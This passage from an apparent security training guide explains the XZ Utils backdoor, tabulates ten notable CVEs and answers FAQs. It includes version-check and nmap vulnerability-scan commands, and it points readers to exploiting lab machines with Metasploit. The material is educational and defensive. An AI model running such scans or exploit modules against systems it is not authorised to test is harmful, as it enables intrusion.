XZ Utils is a data compression library used across virtually all Linux distributions. Because it is linked into systemd — and systemd is linked into sshd (the SSH daemon) on many modern Linux systems — a backdoor in XZ Utils effectively becomes a backdoor in SSH itself. The backdoor was designed to allow the attacker to authenticate to any affected system using a specific private key, bypassing all authentication.

How the attack works

The threat actor, operating under the alias "Jia Tan", began contributing to the XZ Utils project in 2021. Over two years they built a reputation for quality contributions. In 2024 they introduced malicious code into XZ Utils 5.6.0 and 5.6.1, hidden across multiple commits, disguised as test files and build scripts, and obfuscated using multiple layers of encoding.

# The backdoor was discovered accidentally by Andres Freund
# while investigating unusual CPU usage and slow SSH logins

# Check if your system is vulnerable
xz --version
# Vulnerable: xz (XZ Utils) 5.6.0 or 5.6.1
# Safe: 5.4.x (most stable distro releases) or 5.6.2+

# Check which XZ version your SSH links against (Linux)
ldd /usr/sbin/sshd | grep liblzma

# The backdoor mechanism (simplified):
# 1. XZ build scripts inject malicious code into liblzma
# 2. sshd links against liblzma via systemd
# 3. Backdoor hooks RSA key verification in sshd
# 4. Attacker's hardcoded public key bypasses all auth checks
# 5. Attacker gains unauthenticated RCE on any affected SSH server

Real-world impact
  • The backdoor was caught early — Fedora 41 beta and some rolling-release distros (Arch, Debian Testing) had distributed the vulnerable version, but it had not reached stable releases of major distributions
  • The attacker's two-year patient campaign and sophisticated obfuscation techniques suggest a nation-state actor or well-resourced APT group
  • If undetected and widely distributed, this would have been the most catastrophic Linux security incident in history — effectively a master key to SSH on every affected system
  • The discovery has triggered an industry-wide rethink of open-source supply chain security and maintainer vetting processes
🎯 Key lesson for security professionals: XZ Utils is the defining supply chain security event of 2024. It demonstrates that the attack surface for sophisticated actors now includes open-source project maintainers themselves. For defenders: implement software composition analysis (SCA) tools that alert on unexpected library version changes. For pentesters and bug bounty hunters: supply chain attacks are an emerging target — understanding dependency chains and build processes is becoming a core security skill. This CVE also validates why reproducible builds matter — being able to verify that a compiled binary matches the source code is now a security requirement, not a nice-to-have.
Summary reference table — all 10 CVEs
#  | CVE ID         | Name           | Type                | CVSS | Year | Key impact
---|----------------|----------------|---------------------|------|------|-----------
1  | CVE-2021-44228 | Log4Shell      | RCE                 | 10.0 | 2021 | 3 billion+ devices, global exploitation within hours
2  | CVE-2017-0144  | EternalBlue    | RCE / Wormable      | 9.3  | 2017 | WannaCry ($4B damage), NotPetya ($10B damage)
3  | CVE-2014-0160  | Heartbleed     | Info Disclosure     | 7.5  | 2014 | 500K+ HTTPS sites, private keys exposed silently for 2yrs
4  | CVE-2014-6271  | Shellshock     | RCE                 | 10.0 | 2014 | 25-year-old Bash bug, Yahoo breach, mass botnet exploitation
5  | CVE-2019-0708  | BlueKeep       | RCE / Wormable      | 9.8  | 2019 | 1M+ vulnerable RDP servers, cryptomining campaigns
6  | CVE-2021-34527 | PrintNightmare | LPE + RCE           | 8.8  | 2021 | Low-priv user → SYSTEM, ransomware escalation
7  | CVE-2022-22965 | Spring4Shell   | RCE                 | 9.8  | 2022 | Spring Framework, Mirai botnet exploitation
8  | CVE-2023-4966  | Citrix Bleed   | Session Hijack      | 9.4  | 2023 | LockBit breached Boeing, ICBC, MFA bypassed
9  | CVE-2023-34362 | MOVEit SQLi    | SQLi → RCE          | 9.8  | 2023 | 2,700+ orgs breached, 93M records stolen by Cl0p
10 | CVE-2024-3094  | XZ Backdoor    | Supply Chain        | 10.0 | 2024 | 2-year nation-state campaign targeting Linux SSH
💡 The pattern across all 10 CVEs: Look at what connects them: trusted software (Log4j, Bash, OpenSSL, SMB), unauthenticated attack paths, and global impact from a single vulnerability. The lesson is consistent — patch fast, limit attack surface, assume breach, and always scan for these in penetration tests. The most dangerous vulnerabilities are the ones in code everyone trusts and no one scrutinises.

⚡ Put this knowledge to work

  1. Scan for these in your lab — set up Metasploitable 2 and run nmap --script vuln against it. You will find EternalBlue (MS17-010), vsftpd backdoor, and more — then use Metasploit to exploit each one.
  2. Learn the exploitation tools — every CVE here has a Metasploit module. Learn how to use them in an authorised lab environment.
  3. Start bug bounty hunting — MOVEit and Spring4Shell style vulnerabilities appear in enterprise web applications on bug bounty programs constantly.
  4. Follow CVEs as they drop — subscribe to the CISA KEV (Known Exploited Vulnerabilities) catalogue, NVD (nvd.nist.gov), and Packet Storm Security for live CVE intelligence.
  5. Build your Kali toolkit — the commands used to detect and exploit these CVEs are all in your foundational toolkit.
Frequently asked questions
What does CVE stand for?

CVE stands for Common Vulnerabilities and Exposures. It is a standardised list of publicly disclosed cybersecurity vulnerabilities maintained by MITRE Corporation and sponsored by the US Department of Homeland Security. Each CVE entry gets a unique ID in the format CVE-YEAR-NUMBER (e.g., CVE-2021-44228 for Log4Shell). The CVSS (Common Vulnerability Scoring System) score from 0–10 indicates severity.

What is the most dangerous CVE ever discovered?

Log4Shell (CVE-2021-44228) is widely considered the most dangerous CVE in history due to its combination of a perfect CVSS score of 10.0, unauthenticated remote code execution, and the fact that it affected an estimated 3 billion devices across nearly every major technology company and enterprise application. EternalBlue is a close second due to its role in WannaCry and NotPetya, which caused over $14 billion in combined damages.

How do I check if a system is vulnerable to a specific CVE?

The most common methods are: running Nmap with the relevant NSE vulnerability script (e.g., nmap --script smb-vuln-ms17-010 for EternalBlue), using Metasploit's auxiliary scanner modules, running a vulnerability scanner like OpenVAS or Tenable Nessus, or checking the installed software version against the vulnerable version range listed in the CVE database at nvd.nist.gov.

What is the difference between a CVE and an exploit?

A CVE is simply the standardised identifier and description of a vulnerability — it describes the flaw but does not provide attack code. An exploit is the actual code or technique used to take advantage of the vulnerability. Many CVEs have publicly available proof-of-concept exploits on Exploit-DB or GitHub, and the most critical ones have Metasploit modules that make exploitation accessible without custom code development.

How can I stay up to date on new CVEs?

The best sources are: the CISA Known Exploited Vulnerabilities (KEV) catalogue at cisa.gov/known-exploited-vulnerabilities-catalog (the most critical actively exploited CVEs), the National Vulnerability Database at nvd.nist.gov (all CVEs with CVSS scores), vendor security advisories (Microsoft Patch Tuesday, Apache Security Updates, etc.), and The Hacker News for news coverage of major vulnerabilities as they are disclosed.

Are these CVEs still relevant in 2026?

Yes — all 10 CVEs covered in this guide remain actively exploited in 2026. EternalBlue and BlueKeep still successfully compromise unpatched Windows 7 and Server 2008 machines found in industrial, healthcare, and small business environments. Log4Shell continues to be exploited because many organisations still have unpatched Java applications in their environment. Understanding historical CVEs is not just academic — these vulnerabilities are being used in real attacks against real organisations today.
